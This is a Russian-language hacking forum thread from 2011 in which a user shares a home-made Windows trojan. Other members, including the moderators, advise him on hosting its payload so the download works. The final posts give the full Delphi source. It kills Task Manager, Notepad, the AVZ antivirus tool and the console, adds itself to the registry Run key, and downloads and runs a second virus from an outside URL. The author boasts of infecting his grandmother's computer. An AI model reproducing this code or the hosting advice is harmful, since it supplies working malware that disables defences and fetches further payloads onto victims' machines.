|
Trojan.Win32.Link
|
|
link993
|
Дата: Вторник, 14.06.2011, 16:12 | Сообщение # 1
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского"  (если его конечно рассекретят).
После старта он делает следующее:
1. Отрубает и не дает включится следующим процессам:
1.) Блокнот (это так просто);
2.) Диспетчер задач ;
3.) Антивирусная утилита AVZ;
4.) Консоль;
2. Прописывается в реестр;
3. Скачивает вирус Dolphin,a HLLP v.2 (https://delfcode.ru/load/ost/vredonosy/hllp_v_2/14-1-0-447) с этой страницы форума и запускает его;
4. Прекращает свою работу(с закачкой), сидит в памяти и ждет пока его не высекут и не отправят в "Лабораторию Касперского" .
5. Создает ужасные глюки...
Если будете тестировать скачайте прогу чтобы убить процесс троянца. Почистите реестр после запуска по адресу hkey_local_machine\software\microsoft\windows\currentversion\run
Троян с формой, поэтому много весит. Прошу из-за этого сильно не критикуйте. Троян и вирус Вы можете скачать ниже. Если кому-то будет нужен исходник оставляйте просьбу в теме. Комментируйте.
Иконку сменю...
Тестировался на бабушкином компьютере )) После 10 минут мук бабушка сдалась и вызвала мастера...
Качайте файл link2-Trojan)))
Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:36
|
| |
|
|
|
|
gravitas
|
Дата: Вторник, 14.06.2011, 17:43 | Сообщение # 2
|
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
|
Quote (link993)
Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского"
Гыы) "ПрЕвЕд" поди
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
link993
|
Дата: Вторник, 14.06.2011, 18:30 | Сообщение # 3
|
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
gravitas, выкуп требую за сына Касперского
Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:30
|
| |
|
|
|
|
gravitas
|
Дата: Вторник, 14.06.2011, 20:04 | Сообщение # 4
|
|
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
|
Quote (link993)
gravitas, выкуп требую за сына Касперского
Поймали уже похитителей то) Проактивка постаралась наверно
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
gravitas
|
Дата: Вторник, 14.06.2011, 20:08 | Сообщение # 5
|
|
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
|
Есть способ наверняка:
Идешь на форум ЛК и создаешь там в определенном разделе топ. Мол аццкой вирь и т.д.) И линк им даешь.
Они конечно посмеются там основательно, но сообщение твое наверняка получат))
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
link993
|
Дата: Вторник, 14.06.2011, 21:01 | Сообщение # 6
|
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
Quote (gravitas)
Поймали уже похитителей то) Проактивка постаралась наверно biggrin
НЕт,Ж они там антивирусом все население просканировали и нашли!
Как вообще троян? Обращятся на форум касперского с самописным трояном это всеравно, что обращатся в фбр с убийством сына касперского Извини, проблем с законом не хочу...
|
| |
|
|
|
|
XSPY
|
Дата: Среда, 15.06.2011, 10:07 | Сообщение # 7
|
Продвинутый
Группа: Проверенные
Сообщений: 205
Статус: Offline
|
link993, в общем,неплохо.Но,я бы твой вирус не взял бы.Ну скажы-на кой хрен глюки компу?зачем ты зря тратишь процессорное время и ресурсы?
и второй момент-зачем блокнот отрубать?более 90% пользователей инета не смогут ничего твоему вирусу серьезного сделать,так как они не умеют кодить))
а так вроде ниче...
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
|
|
|
|
link993
|
Дата: Среда, 15.06.2011, 10:47 | Сообщение # 8
|
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
XSPY, глюки идут уже после загрузки вируса, в блокноте можно написать бат скрипт, чтобы убить процесс)) |
| |
|
|
|
|
XSPY
|
Дата: Четверг, 16.06.2011, 22:36 | Сообщение # 9
|
|
Продвинутый
Группа: Проверенные
Сообщений: 205
Статус: Offline
|
link993, блин,будто я не знаю когда глюк идёт!
Вот и спрашиваеться-нафига глючить комп?ето сразу палит твой вирус!
А бат скрипт рядовой пользователь не напишет,так как дальше "вконтакте" и одноклассников они не ходют.
Ето все ИМХО.
По сабжу: лучше сделай защиту процесса процессом.
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
|
|
|
|
link993
|
Дата: Пятница, 17.06.2011, 13:15 | Сообщение # 10
|
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает. |
| |
|
|
|
|
gravitas
|
Дата: Пятница, 17.06.2011, 15:07 | Сообщение # 11
|
|
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
|
Quote (link993)
Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает.
Еще бы. Надо как бы авторизироваться сначала. Создай сайт на народе. На него вирь кинь. Так будет работать.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
dolphin
|
Дата: Пятница, 17.06.2011, 15:37 | Сообщение # 12
|
Создатель
Группа: Администраторы
Сообщений: 910
Статус: Offline
|
Quote (gravitas)
Создай сайт на народе. На него вирь кинь. Так будет работать.
Точно. Для него любой бесплатный хост подойдёт, народ проще всего и данных о себе много не нужно.
Я не профессионал, я всего лишь любитель.
Я не вредитель, я всего лишь теоретик.
|
| |
|
|
|
|
link993
|
Дата: Пятница, 17.06.2011, 17:44 | Сообщение # 13
|
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
dolphin, gravitas, сПАСИБО)) СДЕЛАЮ))) |
| |
|
|
|
|
Fedgrisha
|
Дата: Воскресенье, 26.06.2011, 00:35 | Сообщение # 14
|
Новичок
Группа: Пользователи
Сообщений: 1
Статус: Offline
|
дайте пожалуйста исходник его!очень нужно
заранее благодарен!!!!!!!!! |
| |
|
|
|
|
link993
|
Дата: Воскресенье, 26.06.2011, 10:42 | Сообщение # 15
|
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
Вот на форме мемо только. Форм креат в цикле. Не злитест. Все объединил. Если убрать цыкл на скачку то глюков не будет.
Code
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,Registry,UrlMon,ShellApi ;
type
TForm1 = class(TForm)
mmo1: TMemo;
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.FormCreate(Sender: TObject);
const
URL = 'http://delfcode.ru/_fr/5/hllp.exe';
Filename = 'C:\program.exe';
var
reg: tregistry;
begin
while true do
begin
Sleep(5000);
winexec('taskkill /F /IM NOTEPAD.EXE', SW_HIDE);
winexec('taskkill /F /IM taskmgr.exe', SW_HIDE);
winexec('taskkill /F /IM setup.exe', SW_HIDE);
winexec('taskkill /F /IM avz.exe', SW_HIDE);
winexec('taskkill /F /IM cmd.exe', SW_HIDE);
if 0=0 then
begin
reg := tregistry.create;
reg.rootkey := hkey_local_machine;
reg.lazywrite := false;
reg.openkey('software\microsoft\windows\currentversion\run', false);
reg.writestring('ExTaZy', application.exename);
reg.closekey;
reg.free;
if 0=0 then
begin
if FileExists('C:\program.exe')
then
ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1)
else
URLDownloadToFile(nil, PChar(URL), PChar(Filename), 0, nil);
ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1);
end;
end;
end;
end;
end.
Это весь код
Сообщение отредактировал link993 - Воскресенье, 26.06.2011, 10:45
|
| |
|
|
|
|
XSPY
|
Дата: Воскресенье, 26.06.2011, 22:23 | Сообщение # 16
|
|
Продвинутый
Группа: Проверенные
Сообщений: 205
Статус: Offline
|
link993, работает только под админом?
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
|
|
|
|
link993
|
Дата: Понедельник, 27.06.2011, 09:31 | Сообщение # 17
|
|
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
|
Не знаю. Не проверял.  |
| |
|
|
|
